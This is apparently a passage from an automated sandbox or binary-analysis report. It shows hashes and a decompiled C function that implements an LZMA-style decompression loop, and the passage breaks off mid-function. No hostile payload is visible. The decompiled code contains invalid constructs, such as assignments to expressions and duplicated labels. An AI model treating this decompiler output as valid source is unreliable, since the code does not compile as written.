                                                                                                                                                                                                              • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406BC4() {
                                                                                                                                                                                                              				signed int _t539;
                                                                                                                                                                                                              				unsigned short _t540;
                                                                                                                                                                                                              				signed int _t541;
                                                                                                                                                                                                              				void _t542;
                                                                                                                                                                                                              				signed int _t543;
                                                                                                                                                                                                              				signed int _t544;
                                                                                                                                                                                                              				signed int _t573;
                                                                                                                                                                                                              				signed int _t576;
                                                                                                                                                                                                              				signed int _t597;
                                                                                                                                                                                                              				signed int* _t614;
                                                                                                                                                                                                              				void* _t621;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					if( *(_t621 - 0x40) != 1) {
                                                                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                                                                                                              						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                                                                                                              						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                                                                                                              						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                                                                                                              						 *(_t621 - 0x58) = _t539;
                                                                                                                                                                                                              						goto L68;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							L132:
                                                                                                                                                                                                              							 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L133:
                                                                                                                                                                                                              								_t540 =  *_t614;
                                                                                                                                                                                                              								_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                                                              								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                                                              								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                                                              									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                                                              									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                                                              									 *(_t621 - 0x40) = 1;
                                                                                                                                                                                                              									_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                                                              									 *_t614 = _t541;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									 *(_t621 - 0x10) = _t573;
                                                                                                                                                                                                              									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                                              									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              									goto L139;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								L137:
                                                                                                                                                                                                              								if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                                              									 *(_t621 - 0x88) = 5;
                                                                                                                                                                                                              									L170:
                                                                                                                                                                                                              									_t576 = 0x22;
                                                                                                                                                                                                              									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                                                                                                              									_t544 = 0;
                                                                                                                                                                                                              									L172:
                                                                                                                                                                                                              									return _t544;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                                                                                                              								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                                              								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                                              								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								L139:
                                                                                                                                                                                                              								_t542 =  *(_t621 - 0x84);
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										L1:
                                                                                                                                                                                                              										_t543 =  *(_t621 - 0x88);
                                                                                                                                                                                                              										if(_t543 > 0x1c) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              											case 0:
                                                                                                                                                                                                              												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                                              												_t543 =  *( *(_t621 - 0x70));
                                                                                                                                                                                                              												if(_t543 > 0xe1) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t547 = _t543 & 0x000000ff;
                                                                                                                                                                                                              												_push(0x2d);
                                                                                                                                                                                                              												asm("cdq");
                                                                                                                                                                                                              												_pop(_t578);
                                                                                                                                                                                                              												_push(9);
                                                                                                                                                                                                              												_pop(_t579);
                                                                                                                                                                                                              												_t617 = _t547 / _t578;
                                                                                                                                                                                                              												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                                                                                                              												asm("cdq");
                                                                                                                                                                                                              												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                                                                                                              												 *(_t621 - 0x3c) = _t612;
                                                                                                                                                                                                              												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                                                                                                              												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                                                                                                              												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                                                                                                              												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                                                                                                              													L10:
                                                                                                                                                                                                              													if(_t620 == 0) {
                                                                                                                                                                                                              														L12:
                                                                                                                                                                                                              														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                                                                                                              														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                                              														goto L15;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L11;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													do {
                                                                                                                                                                                                              														L11:
                                                                                                                                                                                                              														_t620 = _t620 - 1;
                                                                                                                                                                                                              														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                                                                                                              													} while (_t620 != 0);
                                                                                                                                                                                                              													goto L12;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												if( *(_t621 - 4) != 0) {
                                                                                                                                                                                                              													GlobalFree( *(_t621 - 4));
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              												 *(_t621 - 4) = _t543;
                                                                                                                                                                                                              												if(_t543 == 0) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                                                                                                              													goto L10;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 1:
                                                                                                                                                                                                              												L13:
                                                                                                                                                                                                              												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                                                              												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(_t621 - 0x88) = 1;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                                              												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                                                                                                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                                              												_t45 = _t621 - 0x48;
                                                                                                                                                                                                              												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                                                                                                              												__eflags =  *_t45;
                                                                                                                                                                                                              												L15:
                                                                                                                                                                                                              												if( *(_t621 - 0x48) < 4) {
                                                                                                                                                                                                              													goto L13;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t555 =  *(_t621 - 0x40);
                                                                                                                                                                                                              												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                                                                                                              													L20:
                                                                                                                                                                                                              													 *(_t621 - 0x48) = 5;
                                                                                                                                                                                                              													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              													goto L23;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t621 - 0x74) = _t555;
                                                                                                                                                                                                              												if( *(_t621 - 8) != 0) {
                                                                                                                                                                                                              													GlobalFree( *(_t621 - 8));
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                                                                                                              												 *(_t621 - 8) = _t543;
                                                                                                                                                                                                              												if(_t543 == 0) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L20;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 2:
                                                                                                                                                                                                              												L24:
                                                                                                                                                                                                              												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                                                                                                              												 *(_t621 - 0x84) = 6;
                                                                                                                                                                                                              												 *(_t621 - 0x4c) = _t562;
                                                                                                                                                                                                              												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                                                                                                              												goto L132;
                                                                                                                                                                                                              											case 3:
                                                                                                                                                                                                              												L21:
                                                                                                                                                                                                              												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                                                              												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(_t621 - 0x88) = 3;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                                              												_t67 = _t621 - 0x70;
                                                                                                                                                                                                              												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                                              												__eflags =  *_t67;
                                                                                                                                                                                                              												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L23:
                                                                                                                                                                                                              												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                                                                                                              												if( *(_t621 - 0x48) != 0) {
                                                                                                                                                                                                              													goto L21;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												goto L24;
                                                                                                                                                                                                              											case 4:
                                                                                                                                                                                                              												L133:
                                                                                                                                                                                                              												_t540 =  *_t614;
                                                                                                                                                                                                              												_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                                                              												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                                                              												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                                                              													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                                                              													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                                                              													 *(_t621 - 0x40) = 1;
                                                                                                                                                                                                              													_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                                                              													 *_t614 = _t541;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(_t621 - 0x10) = _t573;
                                                                                                                                                                                                              													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                                              													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L139;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 5:
                                                                                                                                                                                                              												goto L137;
                                                                                                                                                                                                              											case 6:
                                                                                                                                                                                                              												__edx = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              													 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              													L132:
                                                                                                                                                                                                              													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              												__cl = 8;
                                                                                                                                                                                                              												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                              													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              														_t98 = __ebp - 0x38;
                                                                                                                                                                                                              														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              														__eflags =  *_t98;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                              												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													__ebx = 1;
                                                                                                                                                                                                              													goto L61;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													__ebx = 1;
                                                                                                                                                                                                              													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              													goto L41;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 7:
                                                                                                                                                                                                              												goto L0;
                                                                                                                                                                                                              											case 8:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L132:
                                                                                                                                                                                                              													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 9:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													goto L89;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                              												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              												__eflags = _t258;
                                                                                                                                                                                                              												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                              												goto L75;
                                                                                                                                                                                                              											case 0xa:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														L132:
                                                                                                                                                                                                              														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                              														goto L133;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              												goto L88;
                                                                                                                                                                                                              											case 0xb:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              												L88:
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												L89:
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                              												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              												goto L68;
                                                                                                                                                                                                              											case 0xc:
                                                                                                                                                                                                              												L99:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t334 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t334;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												goto L101;
                                                                                                                                                                                                              											case 0xd:
                                                                                                                                                                                                              												L37:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t122 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t122;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L39:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              													goto L48;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													goto L54;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L41:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                                                                              												__eax = __eax << 8;
                                                                                                                                                                                                              												__eax = __eax + __ebx;
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edx;
                                                                                                                                                                                                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L39;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L37;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0xe:
                                                                                                                                                                                                              												L46:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t156 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t156;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L48:
                                                                                                                                                                                                              													__eflags = __ebx - 0x100;
                                                                                                                                                                                                              													if(__ebx >= 0x100) {
                                                                                                                                                                                                              														break;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              													__edx = __ebx + __ebx;
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              													__esi = __edx + __eax;
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x10) >> 0xb;
